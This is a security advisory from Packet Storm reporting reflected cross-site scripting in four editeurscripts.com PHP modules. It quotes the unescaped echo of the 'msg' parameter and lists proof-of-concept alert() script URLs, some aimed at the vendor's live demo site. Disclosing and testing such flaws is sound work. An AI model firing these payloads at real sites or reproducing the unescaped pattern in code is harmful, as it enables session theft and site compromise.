Multiple modules from editeurscripts.com suffer from cross site scripting vulnerabilities.These include EsContacts version 1.0, EsBaseAdmin version 2.1, EsPartenaires version 1.0, and EsNews version 1.2.
e4a77e182ebd28e3bcdd28d8554e8d48021f0e44f50f3e23fe007cc32c2ac2cd#
# Multiple modules XSS vulnerability with the authors editeurscripts.com
# Modules Vulnerable:
# -EScontacts v1.0
# -EsBaseAdmin v2.1
# -EsPartenaires v1.0
# -EsNews v1.2
#
#
# Author: Jonathan Salwan
# Mail : submit [AT] shell-storm.org
# Web : http://www.shell-storm.org
#
# For the 4 modules, the codes were identical.
#
#
# [...]
# if ($_GET["msg"] != "")
# {
# $msg = str_replace("+"," ",$_GET["msg"]);
# $msg = stripslashes($msg);
# echo("<div align=\"center\" class=\"alert\">$msg</div><br />");
# }
# [...]
#
#
# Use Vulnerability:
# ------------------
#
# EsContacts v1.0 => http://localhost/EsContacts/login.php?msg=<script>alert('xss');</script>
#
# EsBaseAdmin v2.1 => http://localhost/EsBaseAdmin/default/login.php?msg=%3Cscript%3Ealert(%27a%27);%3C/script%3E
# Live Demo => http://demo.editeurscripts.com/EsBaseAdmin/default/login.php?msg=%3Cscript%3Ealert(%27xss%27);%3C/script%3E
#
# EsPartenaires v1.0 => http://localhost/EsPartenaires/login.php?msg=%3Cscript%3Ealert(%27xss%27);%3C/script%3E
# Live Demo => http://demo.editeurscripts.com/EsPartenaires/login.php?msg=%3Cscript%3Ealert(%27xss%27);%3C/script%3E
#
#
# EsNews v1.2 => http://localhost/EsNews/admin/news/modifier.php?msg=%3Cscript%3Ealert(%27xss%27);%3C/script%3E
# (not need to be administrator)
#
#
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed